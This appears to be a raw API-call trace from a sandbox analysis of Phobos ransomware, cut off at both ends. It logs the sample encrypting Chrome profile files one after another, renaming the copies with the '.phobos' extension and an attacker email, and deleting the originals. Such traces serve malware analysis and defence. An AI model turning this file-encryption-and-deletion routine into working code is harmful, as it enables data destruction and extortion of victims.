data.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.110] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.110] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.110] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4800, lpOverlapped=0x0) returned 1 [0185.169] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4810, dwBufLen=0x4810 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4810) returned 1 [0185.169] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4810, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4810, lpOverlapped=0x0) returned 1 [0185.170] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0185.170] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.170] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0185.170] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.170] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0185.170] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.170] CloseHandle (hObject=0x180) returned 1 [0185.170] CloseHandle (hObject=0x134) returned 1 [0185.171] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data")) returned 1 [0185.171] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.172] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.172] CloseHandle (hObject=0x134) returned 1 [0185.172] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.172] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=15360) returned 1 [0185.172] CloseHandle (hObject=0x134) returned 1 [0185.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor")) returned 0x2020 [0185.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.173] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.173] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.174] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.174] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3c00, lpOverlapped=0x0) returned 1 [0185.234] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3c10, dwBufLen=0x3c10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3c10) returned 1 [0185.234] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3c10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3c10, lpOverlapped=0x0) returned 1 [0185.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0185.235] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.235] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0185.235] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.235] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0185.235] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.235] CloseHandle (hObject=0x134) returned 1 [0185.235] CloseHandle (hObject=0x180) returned 1 [0185.235] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor")) returned 1 [0185.236] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.237] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.237] CloseHandle (hObject=0x180) returned 1 [0185.237] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.238] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=40) returned 1 [0185.238] CloseHandle (hObject=0x180) returned 1 [0185.238] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state")) returned 0x2020 [0185.238] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.238] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.238] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.238] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.238] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x28, lpOverlapped=0x0) returned 1 [0185.239] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0185.239] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x30, lpOverlapped=0x0) returned 1 [0185.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0185.240] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.240] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0185.240] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.240] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0185.240] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.240] CloseHandle (hObject=0x180) returned 1 [0185.240] CloseHandle (hObject=0x134) returned 1 [0185.241] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state")) returned 1 [0185.241] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.242] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5120) returned 1 [0185.242] CloseHandle (hObject=0x134) returned 1 [0185.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs")) returned 0x2020 [0185.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.242] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.242] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.243] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.243] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1400, lpOverlapped=0x0) returned 1 [0185.244] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1410, dwBufLen=0x1410 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1410) returned 1 [0185.244] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1410, lpOverlapped=0x0) returned 1 [0185.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0185.246] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.246] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0185.246] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.246] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0185.246] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.246] CloseHandle (hObject=0x134) returned 1 [0185.246] CloseHandle (hObject=0x180) returned 1 [0185.246] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs")) returned 1 [0185.247] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.247] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.247] CloseHandle (hObject=0x180) returned 1 [0185.247] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.248] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=6813) returned 1 [0185.248] CloseHandle (hObject=0x180) returned 1 [0185.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences")) returned 0x2020 [0185.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.248] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.248] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.249] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0185.249] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.249] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1a9d, lpOverlapped=0x0) returned 1 [0185.250] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1aa0, dwBufLen=0x1aa0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1aa0) returned 1 [0185.250] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1aa0, lpOverlapped=0x0) returned 1 [0185.251] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0185.251] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.251] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0185.251] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.251] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0185.251] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.251] CloseHandle (hObject=0x180) returned 1 [0185.251] CloseHandle (hObject=0x134) returned 1 [0185.251] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences")) returned 1 [0185.252] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0185.252] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.252] CloseHandle (hObject=0x134) returned 1 [0185.252] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js 